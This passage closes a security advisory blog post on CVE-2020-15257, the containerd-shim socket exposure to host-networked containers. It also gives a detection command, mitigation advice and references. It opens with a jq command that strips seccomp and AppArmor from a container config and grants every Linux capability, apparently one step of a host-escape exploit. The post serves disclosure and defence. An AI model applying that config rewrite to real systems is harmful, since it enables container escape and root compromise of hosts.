jq '. | del(.linux.seccomp) | del(.linux.namespaces[3]) | (.process.apparmorProfile="unconfined") | (.process.capabilities.bounding=["CAP_CHOWN","CAP_DAC_OVERRIDE","CAP_DAC_READ_SEARCH", "CAP_FOWNER","CAP_FSETID","CAP_KILL","CAP_SETGID","CAP_SETUID","CAP_SETPCAP", "CAP_LINUX_IMMUTABLE","CAP_NET_BIND_SERVICE","CAP_NET_BROADCAST","CAP_NET_ADMIN", "CAP_NET_RAW","CAP_IPC_LOCK","CAP_IPC_OWNER","CAP_SYS_MODULE","CAP_SYS_RAWIO", "CAP_SYS_CHROOT","CAP_SYS_PTRACE","CAP_SYS_PACCT","CAP_SYS_ADMIN","CAP_SYS_BOOT", "CAP_SYS_NICE","CAP_SYS_RESOURCE","CAP_SYS_TIME","CAP_SYS_TTY_CONFIG","CAP_MKNOD", "CAP_LEASE","CAP_AUDIT_WRITE","CAP_AUDIT_CONTROL","CAP_SETFCAP","CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN","CAP_SYSLOG","CAP_WAKE_ALARM","CAP_BLOCK_SUSPEND","CAP_AUDIT_READ"]) | (.process.capabilities.effective=.process.capabilities.bounding) | (.process.capabilities.inheritable=.process.capabilities.bounding) | (.process.capabilities.permitted=.process.capabilities.bounding)'
If an attacker can successfully connect to a containerd-shim
socket, they can directly compromise a host. Prior to the patch for CVE-2020-15257 (fixed in containerd 1.3.9 and 1.4.3, with backport patches provided to distros for 1.2.x), host networking on Docker and Kubernetes (when using Docker or containerd CRI) was root-equivalent.
Abstract namespace Unix domain sockets can be extremely dangerous when applied to containerized contexts (especially because containers will often share network namespaces with each other).
It is unclear how the risks of abstract namespace sockets was not taken into account by the core infrastructure responsible for running the majority of the world’s containers. It is also unclear how this behavior went unnoticed for so long. If anything, it suggests that containerd has not undergone a proper security assessment.
Writing exploits to abuse containerd-shim
was pretty fun. Losing an entire test VM that wasn’t fully backed up due to containerd/runc not bothering to unmount everything before rm -rf
ing the supposed “rootfs” was not fun.
Our full technical advisory for this issue is available here.14
Assuming there are containers running on a host, the following command can be used to quickly determine if a vulnerable version of containerd is in use.
$ cat /proc/net/unix | grep 'containerd-shim' | grep '@'
If this is the case, avoid using host networked containers that run as the real root user.
So as not to immediately impact users who have not yet been able to update to a patched version of containerd and restart their containers, we will wait until January 11th, 2021 to publish the full exploit code demonstrating the attacks described in this post. Users should keep in mind that the content in this post is sufficient to develop a working exploit, and are implored to apply the patches (and restart their containers) immediately if they have not done so already.
http://alexander.holbreich.org/docker-components-explained/↩︎
https://github.com/containerd/containerd/blob/v1.3.0/runtime/v1/shim/client/client.go↩︎
https://github.com/containerd/containerd/blob/v1.3.0/cmd/containerd-shim/main_unix.go↩︎
https://github.com/golang/go/blob/a38a917aee626a9b9d5ce2b93964f586bf759ea0/src/syscall/syscall_linux.go#L391↩︎
https://github.com/nccgroup/ebpf/blob/9f3459d52729d4cd75095558a59f8f2808036e10/unixdump/unixdump/__init__.py#L77↩︎
https://github.com/containerd/containerd/blob/v1.3.0/cmd/containerd-shim/shim_linux.go↩︎
https://github.com/containerd/ttrpc/blob/v1.0.1/unixcreds_linux.go↩︎
https://groups.google.com/forum/message/raw?msg=comp.lang.ada/E9bNCvDQ12k/1tezW24ZxdAJ↩︎
https://github.com/moby/moby/blob/master/profiles/apparmor/template.go↩︎
https://github.com/containerd/containerd/blob/v1.3.0/runtime/v1/shim/v1/shim.proto↩︎
https://github.com/containerd/containerd/blob/v1.3.0/runtime/v1/shim/service.go#L117↩︎
https://github.com/containerd/containerd/blob/v1.3.0/pkg/process/io.go#L79↩︎
https://github.com/opencontainers/runtime-spec/blob/master/config.md↩︎
https://research.nccgroup.com/2020/11/30/technical-advisory-containerd-containerd-shim-api-exposed-to-host-network-containers-cve-2020-15257/↩︎